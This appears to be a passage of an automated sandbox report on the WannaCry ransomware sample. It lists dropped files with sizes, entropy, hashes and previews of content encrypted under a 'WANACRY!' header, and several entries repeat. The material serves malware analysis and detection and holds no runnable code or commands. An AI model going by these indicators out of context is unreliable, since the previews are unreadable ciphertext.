                                                                              Preview:WANACRY!....bEo2.....n6......)7.m....:(.V.&..i.Q..\.Q....c....u....\.....w.@..%..]h...`l.../...Y|../Y".J..(..YYs.Q..pH?./.3..#^......^k=.hP..f.P...V.R0.#.".....)..T.@........BY..bV^.d;9...7..,.N.n...'.7 .3..#..cDA...{....v.z.J...IAP.F.......s(....u................!.1..bB.%..4....W.Xp(i.....d.l.r.5.Q....+&...k.~T....Z}..eD..l.r...Jl..d........;.T.{.2r1..y.....p......UM.....Y..N...;4i....OI5.'.PE..0d.....&..%.K%...7.(......oh....[.gA=G..j.....N..V`...1.".K]...i .v....B..@....SW@JM6.......p......\IF....u..s.F....=<T)a.x,..N..-k}@....e:...cJ..E...!.G.a..n.4D9n|Q....f\.2.%(..tJ..u:.[........}k...>3.\.)N.N....d0.Oo.C"WMrj.`CX......W...L.Nb.a....+..*Y./\.......V.vM....J.7.MDo.9.r.e..%...X..t.&..D.H.j.]........l.|....O.i..l."..?H..os........7.0.a..j.........oW...?.......mu.v.7......._.S...g.2.........+......#.Np.....i~eNY....$..Y%..b.HT.q./..@.Zz.`.g..l..0>%@...GHev}.q....6.....G.:....r.{......M.W.h%?o_.6_..z...N.p$:0.....1|..Co....s.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.80845255559452
                                                                              Encrypted:false
                                                                              SSDEEP:24:y568/H3kzdCOu9JnvJgHN1z2tezte5GSy1rKs9Jl:yqd4GHN186JSYp
                                                                              MD5:08C7946E9BB1D4B8E6B304ACDCA31091
                                                                              SHA1:7356230CDCA75E8E69A4E0892712C2F7C4303DD1
                                                                              SHA-256:6F52FDFC1EFD8C0A18781B900B581E6FFE9D32623CEFB3565C734B36975D8026
                                                                              SHA-512:F725C5BF2F7DB80A7E70BDB79D29965CCF09A3E0D716546B201EA0628C34157F0E4769FF96B0405AAD7AA86AE6CF7232164234ED85F1CD9034948D159DE56B6C
                                                                              Malicious:false
                                                                              Preview:.=.....3!lP.E$2......9...#Q..g..D.....V.quy<.R.......!......}....../.e5.%d....y...-.I.....1`BM|1...Y....nVh.cg......v.M.-.(..q. .X5;.. JD7-}u..2..PZk...5...Z...TN..t..v<V...|3.9...L.}.|.p..r.>....w..Zc0X; .6.rR(..N.sQ...8C......F..A.....@.....JP...K.8...[.H@..y....sQ....;..p.R\)w..:...[...`.O....l.h#..?...I.........35s.Fl..(...M...'. ....v.-!..........k.v..#].~.Y.K.c.;}#4..l..K....O.)Y.O/%..S..@.V.^~.\..\.T.N]..][.[..&.4<..n"....0.~v!.......2j3...z..0.m.......bf...&X7H^!.~O.l.e...-w..~...(....?..@.^".....^k.S.d.._..;..;.>...';..*..........l...H.....hT3.....a../.`....I.Z}..\.\..rN.7.....L.B.E....04.e......EK..U.d.,.&1..5......v....N...../...S.....k/#.u..^<..4H$..7..+oT...;.D.*9u%B.....*.+.4.........S,....e+*..^J.0..i.!.. :..RE.7gt....d.d'wj..p..^0.#..B.\<~.....@...2Yo..r...#.!IEQ..w.$Z..E..7.a....#..i.,^..^G....p,.=.+Kx..:...l...,*~..A..-.T.pfY...Z.V...V...-.k...F.m..U].......g...}....Y-...."n..D+.I...Q ..)../...N@IUY..;.Oq.xK......6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848802782806085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkMK6pOUXDdku+00nFXY12UmqRwmfwbHipWOi3VUT+gwQEPfxvH87xM2:bkMzdku+tXY12UmqRRfoisOig+gOHxfo
                                                                              MD5:75CA6BCDCD65E4F3DF932659E25192E8
                                                                              SHA1:2A88F259DC5A9218E39C6E89B6CFA6F515349108
                                                                              SHA-256:52AFD52448D1AE8191B035EAF157F4C81BB036D47AE7B01710AA7C0DD3751F63
                                                                              SHA-512:1D2C222B197B2FFCE2E6B5B7091B224CF59668FE54133E10624C4F3B185F22496AE83BE169FA18A2173F0DED876E3AFA3010E565E001D650AEF62CC192A731B5
                                                                              Malicious:false
                                                                              Preview:WANACRY!......W..g.(/...f[n....R..\c..w.!K.Hm.i.'.C4.xTG.s....O.m.U.9..#.b2.#.....{.......-..L.V..m.i.0.........$../\.,o.r@o<|)1.l.}M.g..).*..[....S...7]..w...h;....>.N.J..~.' .u..{...d....5......4.\.6......3I.x7.YoP.BdPx[e..s..[.#.u...*..].i...,...q..i.!Lz..............r.).i.c.....&...1#..h.m..v..0U>.0....$W|.B%D.CYs.gK..$..5 .zQX.......h....7a....Hg....6ze...SG....._.fZ..@@..H.......z...._Lm.>...N...%..%.e=.H........82*..h..V... ..Y....c..k.WSL..+e........b...........('...WXMB.a.:hi....Pk..W..{.J+62E.+..x7H......e.1...F7.i_.|.p...x..FKOh.........RJ....;Q:'Vo...l.B....NE6<t.....<N..^...'.e.GS..."~.(...B&F.....V...k....7o..:.).c....X[.b.D.t=s./.F...}....Zl....v;BX$..W...$.$y.*......C...._..1.xX.....G..."?..W.....v...t.t.3e.u.*......4Z.5..V#.#h......K./...d..,yu..a2>.~=....Pvb_tdF.s..+..[S..-P}[..-.b=*rk..Q..............O..A,7.t......U.T...t.DUz.Yb...aNV.g.idGY...v..:...@......<"W8...........@......),b\.......9.....0...i.V..5>...U..I.5.3~d..b;j.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848802782806085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkMK6pOUXDdku+00nFXY12UmqRwmfwbHipWOi3VUT+gwQEPfxvH87xM2:bkMzdku+tXY12UmqRRfoisOig+gOHxfo
                                                                              MD5:75CA6BCDCD65E4F3DF932659E25192E8
                                                                              SHA1:2A88F259DC5A9218E39C6E89B6CFA6F515349108
                                                                              SHA-256:52AFD52448D1AE8191B035EAF157F4C81BB036D47AE7B01710AA7C0DD3751F63
                                                                              SHA-512:1D2C222B197B2FFCE2E6B5B7091B224CF59668FE54133E10624C4F3B185F22496AE83BE169FA18A2173F0DED876E3AFA3010E565E001D650AEF62CC192A731B5
                                                                              Malicious:false
                                                                              Preview:WANACRY!......W..g.(/...f[n....R..\c..w.!K.Hm.i.'.C4.xTG.s....O.m.U.9..#.b2.#.....{.......-..L.V..m.i.0.........$../\.,o.r@o<|)1.l.}M.g..).*..[....S...7]..w...h;....>.N.J..~.' .u..{...d....5......4.\.6......3I.x7.YoP.BdPx[e..s..[.#.u...*..].i...,...q..i.!Lz..............r.).i.c.....&...1#..h.m..v..0U>.0....$W|.B%D.CYs.gK..$..5 .zQX.......h....7a....Hg....6ze...SG....._.fZ..@@..H.......z...._Lm.>...N...%..%.e=.H........82*..h..V... ..Y....c..k.WSL..+e........b...........('...WXMB.a.:hi....Pk..W..{.J+62E.+..x7H......e.1...F7.i_.|.p...x..FKOh.........RJ....;Q:'Vo...l.B....NE6<t.....<N..^...'.e.GS..."~.(...B&F.....V...k....7o..:.).c....X[.b.D.t=s./.F...}....Zl....v;BX$..W...$.$y.*......C...._..1.xX.....G..."?..W.....v...t.t.3e.u.*......4Z.5..V#.#h......K./...d..,yu..a2>.~=....Pvb_tdF.s..+..[S..-P}[..-.b=*rk..Q..............O..A,7.t......U.T...t.DUz.Yb...aNV.g.idGY...v..:...@......<"W8...........@......),b\.......9.....0...i.V..5>...U..I.5.3~d..b;j.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.821508582175489
                                                                              Encrypted:false
                                                                              SSDEEP:24:0uT48sRBmWui2N+NKCGZR/WAAwzawsH0V9P1lYwt3A:BT4ziS4gU5DzawU0VxYwt3A
                                                                              MD5:68F20412AE4FC272957DA3E89FC0BCFC
                                                                              SHA1:1931DB0198413269039F9F4CFCB7DC5F7B41C0F0
                                                                              SHA-256:4A7D7AE91681F72C742D0B5C20FDDDC2F242BD425270789E9A63BE70B7BA0ED4
                                                                              SHA-512:F3E5FA42A2A820C975B1E3A7DC7C913CBF6A77E28DE9E5AABA94CA40DA1718B40C4C6684C3E1B9D8C3B91B87475CE8589F807BBE2EF99809FF92286D8CF0F5F8
                                                                              Malicious:true
                                                                              Preview:k.qX...27...[..r.......eOJ"....5......-#;.^...Tfw<.?.ee..:.P.^..MqrC....-..J..'F..:m.J..o...x...O..E..z\>.fGa..c..x.....}..E1Q..*.,.O..u......A.....l...@....2.........]....^..Z.5.Cv...M.j.T..;g..j.OF...{..u... |..7.&.<.z:J.\"...M'U.K.pA.....?,......;....R.ANG`..q.U....^.\o>.....2.H.=n......s.GsGP@......4......G....z{.|.HU.g._z..v....8.*..!w..B.....&...!.DV....N.}...j..(%D.r3.vNys2.0...m......;F..L......zG&g..`...D.Z.X.m..sh.....<.....]!.\.d..>iO...cn.i......H..M.K0...L.x..W.Y3.s..........gM}....!..S...0..V.ZCr..D8....Ph........W...@.diVw...Y..M......1...............su5.)R..;.'~.Ql`.o.w..nF..G-.O<...c.?.w.:...1f.......w..i}...k..I.....(...*..J:.k..a1+.<.W....#.4....s.m.-.l....:.d;... .m/.g..mR.X}..G...Y...JMjC._2....&Y.M.C....9..)..So...].'.a...[..z.4nz\aO.......0..M...*......r.+Fs..IV...2.{.Lj/V..wg...BT..9.q_.(go..VqU..A.x...R3..h..^....6...A..v......t...lY\_.......W....x=.6....E%.Q..LM!%8O.yi*....ZN"..;D.r.....sD..#.+%..@..V]b.y..M.P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837280828995578
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGbDiY5mka7FgQ7iAr9uMpbb2uj80qRlAautEis/VKDzr1Kz6KnB:bkGSY5A7FNtZxWujSAautO/8DzaL
                                                                              MD5:6BF10E1A17B10F5B956C574AB4B43C59
                                                                              SHA1:6FBEC37F280CB33DD9EAEFC13DC078A295F02816
                                                                              SHA-256:085CE232715ED711886A1328EF8992C62EC09AF984FB2D5A1C84FF8889DE115F
                                                                              SHA-512:7A6F315F32942A01805FFF5680ECEB911333CD50153EBA0BAE66CFB517D1B88ED3C9AA89BE539956C5E364D502F274DB4BA9BBA7CBBB3AB0BC9F8660C7F19557
                                                                              Malicious:false
                                                                              Preview:WANACRY!....s..]j......v.WPBa....<........e..b. ...1N...c.gkE.7..n.G...(sTr.0.Ze.cqm7_.......M `#..(......F..B...N......]../...(@.Q..:.!..k.m.v.F.0..8.z...P(..!.jfSjCN6.Q..S.pzo.$.}...0....j.fSv.j.Y.A".>[......o.l.C.........e..u.... .....}....z..x..d_...yAO..................V5.. J....&B.......N.#?.v._...D.WBt.e,.Y....kF.1f..dp..].{.n...K..}..FEM`2#y.5^..vG.....7#..t...u.4..*._.#.....!...Qt8`/.r".G..n......].k.....\Dl./.`-UR._..An-.B....7..w..Pj.:....2.u..c.kF...6.72..._.h}b...*..~._...T.....|.@.X.D+..=1.x.....C..8!.....S.:.~.H4.W....e.o.?...x.....ju...G..NH.mL..M.V.'...t. a,W...%.|.l..xC1..C..$+.7PvT2..I...R...J.I..TIuV...z.T..[..9f..Vn.Vd..'vUi........$b....:`!j.Z....6.ygH.c}yC.f;.e...Oe.....(...3u.(.Y....}..E+;.Qp....r.4..!Z<.....u5..x<...WD_v....7./S..T.e..q.+.xS....../.....a!.d....8..g.....5.`?...y.2..I....7.*|q..V*..0.I.?...8.....r?.>..Bgu.Z...8=..=1#.8.#G.?.......|C...../.O...P..+.u...2..*.5j.;t......^Jst..YK...0..j..W..o/8..:...$m........A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837280828995578
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGbDiY5mka7FgQ7iAr9uMpbb2uj80qRlAautEis/VKDzr1Kz6KnB:bkGSY5A7FNtZxWujSAautO/8DzaL
                                                                              MD5:6BF10E1A17B10F5B956C574AB4B43C59
                                                                              SHA1:6FBEC37F280CB33DD9EAEFC13DC078A295F02816
                                                                              SHA-256:085CE232715ED711886A1328EF8992C62EC09AF984FB2D5A1C84FF8889DE115F
                                                                              SHA-512:7A6F315F32942A01805FFF5680ECEB911333CD50153EBA0BAE66CFB517D1B88ED3C9AA89BE539956C5E364D502F274DB4BA9BBA7CBBB3AB0BC9F8660C7F19557
                                                                              Malicious:false
                                                                              Preview:WANACRY!....s..]j......v.WPBa....<........e..b. ...1N...c.gkE.7..n.G...(sTr.0.Ze.cqm7_.......M `#..(......F..B...N......]../...(@.Q..:.!..k.m.v.F.0..8.z...P(..!.jfSjCN6.Q..S.pzo.$.}...0....j.fSv.j.Y.A".>[......o.l.C.........e..u.... .....}....z..x..d_...yAO..................V5.. J....&B.......N.#?.v._...D.WBt.e,.Y....kF.1f..dp..].{.n...K..}..FEM`2#y.5^..vG.....7#..t...u.4..*._.#.....!...Qt8`/.r".G..n......].k.....\Dl./.`-UR._..An-.B....7..w..Pj.:....2.u..c.kF...6.72..._.h}b...*..~._...T.....|.@.X.D+..=1.x.....C..8!.....S.:.~.H4.W....e.o.?...x.....ju...G..NH.mL..M.V.'...t. a,W...%.|.l..xC1..C..$+.7PvT2..I...R...J.I..TIuV...z.T..[..9f..Vn.Vd..'vUi........$b....:`!j.Z....6.ygH.c}yC.f;.e...Oe.....(...3u.(.Y....}..E+;.Qp....r.4..!Z<.....u5..x<...WD_v....7./S..T.e..q.+.xS....../.....a!.d....8..g.....5.`?...y.2..I....7.*|q..V*..0.I.?...8.....r?.>..Bgu.Z...8=..=1#.8.#G.?.......|C...../.O...P..+.u...2..*.5j.;t......^Jst..YK...0..j..W..o/8..:...$m........A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.804549268827118
                                                                              Encrypted:false
                                                                              SSDEEP:24:DQhgyrYOIwqOUDeKFvF+5lOmLTKGuGo7/n9RPrT:DZyr1qnS2EXLTKp3/
                                                                              MD5:1D9C6D4C0293BCF140EFCD745AFA4A47
                                                                              SHA1:5D1C68519DF01F724469921C967A8A415F34AEA5
                                                                              SHA-256:C122CA6D1A59D125EE1044E5039DD646290DACCE62651A33AF749AB2DC920F5C
                                                                              SHA-512:DE2C9DB721105167264C41E25C7DC156B40F0BA183635735E840393A7412346752C1F8EC408CF3E0D9BB7D7E9FFB07C6E228FFF08DFAC270E21A9EF80A25A018
                                                                              Malicious:false
                                                                              Preview:.%.....Ke...$....#b.o.U.?R...0.}.....W....(..3.%..H8x6.......).o.k.R.o..$.....*..~.c&u.JM.nd.o...8.i..~]......Z..z.2Y.j./...ow.q..r.v...Lz......A..U...(.P.....N..|..^./.... ......K...)Z..\.j.b..r.Y..8z6M.^.B.i./_................. /.!.b.._.7..2.CK#..t(.!u..._..[..6.....6Mz;N4U.{4":.IC.e.Y.E0j.=..>.....G.!.;..a.."?.s.#%...^.X.(#...5....q ..N..*x...*j..9R..0....+...6.l`.`n.....*.b.R98..M.l.s.J..A..".....vr7.y.;/=..E2I8o...~.-..U.%d..w.{2.JH.....n.....P4......x....1f...0W.L.o....%cK.I.f`.....0.R.i.x...?.N..v.?......`#@y.|..3..m.`..>>...A..;~a... y:..^.w..&..{...$s......#..Q.........op....i...;.!b*S.............C..=l..Pj!St.=...S...D.?~Qt_...E..U\.=.O..e.q|...y.].:P...Y.y.r..&].......}.}.z...&)..q...l....{..N.(...b54|..3!..|...-f.6.{&@.m. ...<....G.~x)|l.}.m-....%.2..T.X.- 9,.E...t.n..&H.f]{...=Z..zkW)..%>i/.5.|...C..[.ioJ......^.Dj.........o.l...e..#<S...R./64.l...5..\wT.a..ZMj|...".......SZh.............r.......MeC......"#".h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842399887984834
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/k0Kr0N0hQ6m6V9SrvaS8HKOKwGZwAtMsRJc/ASx373BVMJwiMpTFP58aD:bktKr0qhH9SrvcPGhtMO2B7kq3/uaD
                                                                              MD5:07B23CBFED11FAB1F4C6C346B5E33F35
                                                                              SHA1:EBAFB165E64CC90B0207E7B088BDC9526690BAE7
                                                                              SHA-256:7A6D5CE04DF807D2EB9571FA681486901AC91BB990D0B5E81A647916A9966D99
                                                                              SHA-512:C87C91B3599442D1F8C6E4F3C8091ED3D1658E036BEA7C64920948974253C27FBE0FACF0FCCA8CCE3136AFCA853136073FF79F9CCB6E5EAF24A94DBDD55535A1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g...XK5.~.je7....:.'.\...Q<X....".-.,.S.x....Y...G..$.y...D0..-...x.l ...d.....0....nx}....@.D.LA.wv..R/B...$....-.x..S.F.....:.j9@....t0;.@..d..........~..2r.C......H.....Y.B....Q.......+.....L..`.....x.s.n.zm.E.G+..gv.....}..&AI~]..;Ds.7................&.B'...|M....C....I...."G`.S.n[.`..dR.t...i...l.G..4p...m...@...]A.3....xm.,...s>.....j......Z.Y@.L...=<..B/..9..F..~i.e...w`......;..l&..;.E.`..o...05.}'.~..>....>4H.~U..JW.{)..W.J/`.?...y/p.}.ef.\...V.3.u...5.b......S/.M8@{Ec..)..V.j............td......&J.2g..A.4./...YqM.q...O.h...<.w\..HM.......G...HW....."..`.....vni..,...d......#....1.&R......=....z/.._lw\.Fx..1..!\U...o....7.va..\.Y..).M.`.X...6.U^..]...:..H.........I....K.p)..!v..-....#5+........]....!.%......}Iy..J.~f.a3*..h.{......Y....".{.3V.!.>.b....[..6.o|.. !........<.m...Mh..g.Q..C.....u..^.....;+......w].*u............7.l1...~!.....!...5)..SF..P.[ .n76.A7f.;]p..WBw.&.....~.)..g..v..u..4.|)./.*N....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842399887984834
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/k0Kr0N0hQ6m6V9SrvaS8HKOKwGZwAtMsRJc/ASx373BVMJwiMpTFP58aD:bktKr0qhH9SrvcPGhtMO2B7kq3/uaD
                                                                              MD5:07B23CBFED11FAB1F4C6C346B5E33F35
                                                                              SHA1:EBAFB165E64CC90B0207E7B088BDC9526690BAE7
                                                                              SHA-256:7A6D5CE04DF807D2EB9571FA681486901AC91BB990D0B5E81A647916A9966D99
                                                                              SHA-512:C87C91B3599442D1F8C6E4F3C8091ED3D1658E036BEA7C64920948974253C27FBE0FACF0FCCA8CCE3136AFCA853136073FF79F9CCB6E5EAF24A94DBDD55535A1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g...XK5.~.je7....:.'.\...Q<X....".-.,.S.x....Y...G..$.y...D0..-...x.l ...d.....0....nx}....@.D.LA.wv..R/B...$....-.x..S.F.....:.j9@....t0;.@..d..........~..2r.C......H.....Y.B....Q.......+.....L..`.....x.s.n.zm.E.G+..gv.....}..&AI~]..;Ds.7................&.B'...|M....C....I...."G`.S.n[.`..dR.t...i...l.G..4p...m...@...]A.3....xm.,...s>.....j......Z.Y@.L...=<..B/..9..F..~i.e...w`......;..l&..;.E.`..o...05.}'.~..>....>4H.~U..JW.{)..W.J/`.?...y/p.}.ef.\...V.3.u...5.b......S/.M8@{Ec..)..V.j............td......&J.2g..A.4./...YqM.q...O.h...<.w\..HM.......G...HW....."..`.....vni..,...d......#....1.&R......=....z/.._lw\.Fx..1..!\U...o....7.va..\.Y..).M.`.X...6.U^..]...:..H.........I....K.p)..!v..-....#5+........]....!.%......}Iy..J.~f.a3*..h.{......Y....".{.3V.!.>.b....[..6.o|.. !........<.m...Mh..g.Q..C.....u..^.....;+......w].*u............7.l1...~!.....!...5)..SF..P.[ .n76.A7f.;]p..WBw.&.....~.)..g..v..u..4.|)./.*N....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.822724817576679
                                                                              Encrypted:false
                                                                              SSDEEP:24:n3lAsDsqg/awLNTUNIu+syIh8E1rjZRbWFcT+N1zEqgeuGeRoO:VAsIqglR21h8enrZoW2O
                                                                              MD5:AF0FB0726366348B27C18AD10A581AE9
                                                                              SHA1:373F990CDF8309BB769F75208659C8763BF25F5F
                                                                              SHA-256:E71EEA745F9D4DBD967597F87662CDF4916F12F7333A0B093272A5F99143F506
                                                                              SHA-512:D79A0CEBC29F14F8EB5AC9724D736FCB40B7E10855A075262A00707028669DB537803C19EBC21A7DEE4B5D983C980120FE12DCC09450BE163736CD7A859335D8
                                                                              Malicious:false
                                                                              Preview:...}...........X.....).zT...-Y.3.....U.|B4|.....].%N5..../......r........p0........Z/.3....`...=..f.....G.m.t|......s%.=...i....AqW.|e(..'..t...R..*.Z).V.....xV..QM....I.7.~...8.u9.,.&W...#.........</.....NJc.M..G.mb.,...q..B@..K..r..<...4bI..........4w.....b..(...J...8....ff`N.u.5&.:.+'0..Q..{.#....wQ.{..H...X...r...3........0...........;.!.(...E.6....l^.x_..BN.?n........QQ..=..'.j-;..p.L.`......9.B...v6.IP..t.n..H..3.).v^.P..v.r.A.....43.S...v.L..i..'}.">?1CQ.e[Ubn..0|..<..+.Hv.S$...ao.4%>........@.]U~J.....z....f.}H.;....q`......[...c...g.P....k...k.....[...+..P.N.F./...B.%..~..5S...mh{......,MM..^.F.0.7.),53,...\;.x.[.=Kw...0@a.v.[.:.]U..uS..vO.W.S.4..T54.D.1.....t...!...Y"..t.C......Iq.c.......1]....r..B.I........q.E..k<....n..1.....5....Jo.0j....C3)(............GR.....)&.se.....7.;...yMp..B..P..t.._.....1i./.X..]."zt!...ZNyr.T_.'"X<q.K;.A.....N.....u.,..l.......L.V..O.a..........S....i(.Zh....,.......;.s.!.z).k..P p.SL
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84808606479744
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkopWrbLWL0o6lLE7qRlCOQ0lGBs9XPWookfdx3pWZOxGg77xOmjdPqUjUl3PzZM:bkBM6lb9Q0lhswx3ptxGo7x9hUfV+2u
                                                                              MD5:C6F207AFBDC77CDD66E6478C2397B51A
                                                                              SHA1:0AFBCE8CA1411752C143444EFD83F50A6ECFE2C0
                                                                              SHA-256:EE1035C28A46A15990E5103D2A8B6116F421896CAD7F3F18D0C6DB9F4F64AB02
                                                                              SHA-512:BCA5EF73A6F1261AEA1695C7B3D71EB334528B02EA0D38103737D36ABBD66DD1C0605D36B8B092761E1A8309E99A0CE7ACE48B9B9956AD810FE32D3BE65EC538
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......u..d..|kg.....4`..6......P.cD...V...nr8aO=s...W....4...{W.&....v...N=.!q...O....d*...x.3...z:....y.......y,.K.....{Xr....C...,.......#.P/jU.......u.`{k-.'Q.?.....#...~....z&C.2.-.-=..P.|!...U@Bo..B..`.'..6g#....6.j^..'.rDo.c.R.Zl`hpJ..Y..ws..h............@./R24...=b3.U8....Z@v.;..,.|.>6.......-.....3..)......zL...A.-....{h.U.."N..QA..v....R'_.L:*.~m..O..E.y2G}.K.jW..a....2.........1.]A..9`.}....gp.Xu.)....f$......oo...gO.F8. _.........o..4...8H..^..D....t.bt.yn....I.....Lw.n..*...\c..kL*$T..W..y....".....9F'.dG&0.cete_W&l...~...~...s(.Z|....a.r.....<...J.J^.#Z.+P..E...$r....3n....Bp.....5.....f.YR-y.%....iF....=.H%...`...m.k..tG...(..r9.._d........9.h....8......n.P.............k(+T........]W6].F{..\dA..#..h..>+....,}..4.R.....U.....A...r........PG.cf.$...............[y./.Z.w./=.i$k...F....Q.RK..l^2re..EuV %5a..Q.DB&.g.NZ./].){Z..8..V..l.%.>.9w..s../%(..&..s...E6@PYc...<.&<t..n..S......}u...hb/.Wg..2M.#.....[.#q.....%..z$.K.*,.8....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84808606479744
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkopWrbLWL0o6lLE7qRlCOQ0lGBs9XPWookfdx3pWZOxGg77xOmjdPqUjUl3PzZM:bkBM6lb9Q0lhswx3ptxGo7x9hUfV+2u
                                                                              MD5:C6F207AFBDC77CDD66E6478C2397B51A
                                                                              SHA1:0AFBCE8CA1411752C143444EFD83F50A6ECFE2C0
                                                                              SHA-256:EE1035C28A46A15990E5103D2A8B6116F421896CAD7F3F18D0C6DB9F4F64AB02
                                                                              SHA-512:BCA5EF73A6F1261AEA1695C7B3D71EB334528B02EA0D38103737D36ABBD66DD1C0605D36B8B092761E1A8309E99A0CE7ACE48B9B9956AD810FE32D3BE65EC538
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......u..d..|kg.....4`..6......P.cD...V...nr8aO=s...W....4...{W.&....v...N=.!q...O....d*...x.3...z:....y.......y,.K.....{Xr....C...,.......#.P/jU.......u.`{k-.'Q.?.....#...~....z&C.2.-.-=..P.|!...U@Bo..B..`.'..6g#....6.j^..'.rDo.c.R.Zl`hpJ..Y..ws..h............@./R24...=b3.U8....Z@v.;..,.|.>6.......-.....3..)......zL...A.-....{h.U.."N..QA..v....R'_.L:*.~m..O..E.y2G}.K.jW..a....2.........1.]A..9`.}....gp.Xu.)....f$......oo...gO.F8. _.........o..4...8H..^..D....t.bt.yn....I.....Lw.n..*...\c..kL*$T..W..y....".....9F'.dG&0.cete_W&l...~...~...s(.Z|....a.r.....<...J.J^.#Z.+P..E...$r....3n....Bp.....5.....f.YR-y.%....iF....=.H%...`...m.k..tG...(..r9.._d........9.h....8......n.P.............k(+T........]W6].F{..\dA..#..h..>+....,}..4.R.....U.....A...r........PG.cf.$...............[y./.Z.w./=.i$k...F....Q.RK..l^2re..EuV %5a..Q.DB&.g.NZ./].){Z..8..V..l.%.>.9w..s../%(..&..s...E6@PYc...<.&<t..n..S......}u...hb/.Wg..2M.#.....[.#q.....%..z$.K.*,.8....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803031942558827
                                                                              Encrypted:false
                                                                              SSDEEP:24:FzTVPGKc5cPMceOxZgvvhnuf+pZM8EtWA9Lp1pkCIu:95+K+gMcdZsZaaM7v1KCIu
                                                                              MD5:B1D8F69EAE08697C05761E6448425865
                                                                              SHA1:EC7FCD8DF3B43B6C53F2261F431F59130F76C442
                                                                              SHA-256:9D95CFC9E0A9CF540971E19E2400D3C46667B053EB9ABC4C4DFD5F5C45137892
                                                                              SHA-512:9636617397F0BFA55D4BBEB16E12AB87BF63D9F3A225D6EF0868E33E2693C539FFCCC07FCDE4823ECD4C6BBCDAD4F65A015C7C4D7D21EFEE41FDD1A91B3EE1F0
                                                                              Malicious:false
                                                                              Preview::.lG'...q..h&......<c..@....,..:......-..#.....J..q.....dD+.Cn.v..%.t4...q7.H..>Yn.q/..X....T...~.h.........=.c...).S..J.*&^_....XxT..).1r./k&N.,#...|S. .....]...hw.z.-i.{.9m...(>.WJ...?....v).{....?>.{Z...D,...z..Y...?Ty.....W.wi.#3S.8..{.I.=/.Z.}.n..P.6.......L....dR ...,$.J.7h.!...z9.g.w.a._cX....6....;R.'."fz.....T.waV..I.R,Y".M...e)...[.}.......y.vjGE##.u.b.T.....h......&..s\...o.w.7.....*y.......b....KNf.?...E.#."..).c..sw..x..~+......k/.6p<I.&.I.....EP..a.M...L..h..,...]I..Kv..m.fa>..g.X;B.....DDv.(bl...J+...........\.'.Y...6|U......-.,.....W......+V%........).B~+Qp....&..cy.\i.....h.'_.......1.........h.o..B..zO..Sf.p.........72..WD.x.X....y..' ...F..%>....T..0.........x. J9J..f.C...H.S2...c....z..c......Q.i..0].ij.KH#.=..sqVqE.W..<.0..IA.....b"...."]'.XxSH.2.F....;8t.j.....c|%.AG..GRah]...E...y'.~.%..(.qm.0......qp.R.Xe....[P.P(....F..z.."Fds.j..3).I...........uNF....<..x+..!...x....Z....`J}....:Z.fc.......L......T.?r.ce........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839370318921595
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC4wtu411SgrHJWrZD/Qf1uOwQbUIm2tIPCWaBsdFfDBk:bkStVSjFTsNtm2tIan+K
                                                                              MD5:49104846E631E2A0653EFE98265F030B
                                                                              SHA1:DC0C7F2EF07E31704A5C98DEDD15A71335E52776
                                                                              SHA-256:871B000BFAEFAC9538468B388C98FFFC07F94AE117BD5C9D145EC4BF700D6B66
                                                                              SHA-512:6619F86D492DC66724047524E55EE9D804D8AFF3B724419CACAAA197135923A10F50208D22ABE25A1A1ABBCC6E6F75DF9C3A15DADAD92855D19B68C20785BF4F
                                                                              Malicious:false
